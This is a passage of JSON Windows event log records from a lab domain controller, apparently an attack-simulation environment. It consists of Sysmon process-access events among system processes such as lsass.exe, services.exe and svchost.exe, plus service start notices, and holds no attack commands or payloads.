C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.655","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001091170500}","TargetProcessId":"3364","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.733\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.733","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001091170500}","TargetProcessId":"3364","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.733\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.733","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001091170500}","TargetProcessId":"3364","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76849,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The Distributed Transaction Coordinator service entered the running state.","param1":"Distributed Transaction Coordinator","param2":"running","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.796\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.796","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.796\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.796","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.796\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.796","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.889\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.889","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.889\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103800\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.889","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103800","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76850,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The sppsvc service entered the running state.","param1":"sppsvc","param2":"running","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.952\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 